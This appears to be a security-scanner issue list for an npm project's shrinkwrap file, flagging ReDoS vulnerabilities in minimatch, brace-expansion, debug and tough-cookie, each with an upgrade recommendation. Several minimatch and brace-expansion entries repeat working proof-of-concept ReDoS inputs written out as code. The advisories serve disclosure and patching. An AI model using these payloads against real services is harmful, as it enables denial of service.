ramitos/rn-nested-stylesheet


Showing 11 of 11 total issues

minimatch Regular Expression Denial of Service
Open

            "minimatch": {
              "version": "3.0.0",
              "from": "minimatch@^3.0.0",
              "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.0.0.tgz",
              "dependencies": {
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

Regular Expression Denial of Service

Overview:

Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript RegExp objects. The primary function, minimatch(path, pattern) is vulnerable to ReDoS in the pattern parameter. This is because of the regular expression on line 521 of minimatch.js: /((?:\\{2})*)(\\?)\|/g,. The problematic portion of the regex is ((?:\\{2})*) which matches against \\.

A proof of concept is as follows:

```javascript
var minimatch = require("minimatch");

// utility function for generating long strings
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i <= len; i++) { result = result + chr; }
  return result;
};

// a long run of backslashes drives the backtracking in ((?:\\{2})*)
var exploit = "[!" + genstr(1000000, "\\") + "A";

// minimatch exploit.
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
```

Recommendation:

Update to version 3.0.2 or greater.

minimatch Regular Expression Denial of Service
Open

            "minimatch": {
              "version": "3.0.0",
              "from": "minimatch@^3.0.0",
              "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.0.0.tgz",
              "dependencies": {
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

Regular Expression Denial of Service

Overview:

Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript RegExp objects. The primary function, minimatch(path, pattern) is vulnerable to ReDoS in the pattern parameter. This is because of the regular expression on line 521 of minimatch.js: /((?:\\{2})*)(\\?)\|/g,. The problematic portion of the regex is ((?:\\{2})*) which matches against \\.

A proof of concept is as follows:

```javascript
var minimatch = require("minimatch");

// utility function for generating long strings
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i <= len; i++) { result = result + chr; }
  return result;
};

// a long run of backslashes drives the backtracking in ((?:\\{2})*)
var exploit = "[!" + genstr(1000000, "\\") + "A";

// minimatch exploit.
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
```

Recommendation:

Update to version 3.0.2 or greater.

brace-expansion ReDoS
Open

                "brace-expansion": {
                  "version": "1.1.3",
                  "from": "brace-expansion@^1.0.0",
                  "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.3.tgz",
                  "dependencies": {
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

ReDoS

Overview:

brace-expansion is a module to support bash-like brace expansion in JavaScript. For example, {1,2,3,4} would expand to 1 2 3 4. brace-expansion versions before 1.1.7 are vulnerable to Regular Expression Denial of Service attacks. A proof of concept is provided below:

```javascript
var expand = require('brace-expansion');
// a long run of commas inside the braces triggers the catastrophic backtracking
expand('{,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n}');
```

Recommendation:

Upgrade to version 1.1.7 or later.

debug Regular Expression Denial of Service
Open

    "debug": {
      "version": "2.2.0",
      "from": "debug@>=2.2.0 <3.0.0",
      "resolved": "https://registry.npmjs.org/debug/-/debug-2.2.0.tgz"
    },
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

Regular Expression Denial of Service

Overview:

The debug module is vulnerable to regular expression denial of service when untrusted user input is passed into the o formatter. It takes around 50k characters to block for 2 seconds, making this a low-severity issue.

Recommendation:

Upgrade to version 2.6.9 or greater if you are on the 2.6.x series, or to 3.1.0 or greater.

minimatch Regular Expression Denial of Service
Open

            "minimatch": {
              "version": "3.0.0",
              "from": "minimatch@^3.0.0",
              "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.0.0.tgz",
              "dependencies": {
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

Regular Expression Denial of Service

Overview:

Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript RegExp objects. The primary function, minimatch(path, pattern) is vulnerable to ReDoS in the pattern parameter. This is because of the regular expression on line 521 of minimatch.js: /((?:\\{2})*)(\\?)\|/g,. The problematic portion of the regex is ((?:\\{2})*) which matches against \\.

A proof of concept is as follows:

```javascript
var minimatch = require("minimatch");

// utility function for generating long strings
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i <= len; i++) { result = result + chr; }
  return result;
};

// a long run of backslashes drives the backtracking in ((?:\\{2})*)
var exploit = "[!" + genstr(1000000, "\\") + "A";

// minimatch exploit.
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
```

Recommendation:

Update to version 3.0.2 or greater.

debug Regular Expression Denial of Service
Open

    "debug": {
      "version": "2.2.0",
      "from": "debug@>=2.2.0 <3.0.0",
      "resolved": "https://registry.npmjs.org/debug/-/debug-2.2.0.tgz"
    },
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

Regular Expression Denial of Service

Overview:

The debug module is vulnerable to regular expression denial of service when untrusted user input is passed into the o formatter. It takes around 50k characters to block for 2 seconds, making this a low-severity issue.

Recommendation:

Upgrade to version 2.6.9 or greater if you are on the 2.6.x series, or to 3.1.0 or greater.

tough-cookie Regular Expression Denial of Service
Open

        "tough-cookie": {
          "version": "2.2.2",
          "from": "tough-cookie@~2.2.0",
          "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.2.2.tgz"
        },
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

Regular Expression Denial of Service

Overview:

The tough-cookie module is vulnerable to regular expression denial of service. Input of around 50k characters is required for a slowdown of around 2 seconds.

Unless node was compiled using the -DHTTP_MAX_HEADER_SIZE= option, the default header max length is 80kb, so the impact of the ReDoS is limited to around 7.3 seconds of blocking.

At the time of writing, all versions <=2.3.2 are vulnerable.

Recommendation:

Please update to version 2.3.3 or greater.

brace-expansion ReDoS
Open

                "brace-expansion": {
                  "version": "1.1.3",
                  "from": "brace-expansion@^1.0.0",
                  "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.3.tgz",
                  "dependencies": {
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

ReDoS

Overview:

brace-expansion is a module to support bash-like brace expansion in JavaScript. For example, {1,2,3,4} would expand to 1 2 3 4. brace-expansion versions before 1.1.7 are vulnerable to Regular Expression Denial of Service attacks. A proof of concept is provided below:

```javascript
var expand = require('brace-expansion');
// a long run of commas inside the braces triggers the catastrophic backtracking
expand('{,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n}');
```

Recommendation:

Upgrade to version 1.1.7 or later.

brace-expansion ReDoS
Open

    "brace-expansion": {
      "version": "1.1.4",
      "from": "brace-expansion@>=1.0.0 <2.0.0",
      "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.4.tgz"
    },
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

ReDoS

Overview:

brace-expansion is a module to support bash-like brace expansion in JavaScript. For example, {1,2,3,4} would expand to 1 2 3 4. brace-expansion versions before 1.1.7 are vulnerable to Regular Expression Denial of Service attacks. A proof of concept is provided below:

```javascript
var expand = require('brace-expansion');
// a long run of commas inside the braces triggers the catastrophic backtracking
expand('{,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n}');
```

Recommendation:

Upgrade to version 1.1.7 or later.

minimatch Regular Expression Denial of Service
Open

    "minimatch": {
      "version": "2.0.10",
      "from": "minimatch@>=2.0.3 <3.0.0",
      "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-2.0.10.tgz"
    },
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

Regular Expression Denial of Service

Overview:

Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript RegExp objects. The primary function, minimatch(path, pattern) is vulnerable to ReDoS in the pattern parameter. This is because of the regular expression on line 521 of minimatch.js: /((?:\\{2})*)(\\?)\|/g,. The problematic portion of the regex is ((?:\\{2})*) which matches against \\.

A proof of concept is as follows:

```javascript
var minimatch = require("minimatch");

// utility function for generating long strings
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i <= len; i++) { result = result + chr; }
  return result;
};

// a long run of backslashes drives the backtracking in ((?:\\{2})*)
var exploit = "[!" + genstr(1000000, "\\") + "A";

// minimatch exploit.
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
```

Recommendation:

Update to version 3.0.2 or greater.

tough-cookie ReDoS via long string of semicolons
Open

        "tough-cookie": {
          "version": "2.2.2",
          "from": "tough-cookie@~2.2.0",
          "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.2.2.tgz"
        },
Severity: Minor
Found in npm-shrinkwrap.json by nodesecurity

ReDoS via long string of semicolons

Overview:

Tough-cookie is a cookie parsing and management library.

Versions 0.9.7 through 2.2.2 contain a vulnerable regular expression that, under certain conditions involving long strings of semicolons in the "Set-Cookie" header, causes the event loop to block for excessive amounts of time.

Recommendation:

Upgrade to at least version 2.3.0.
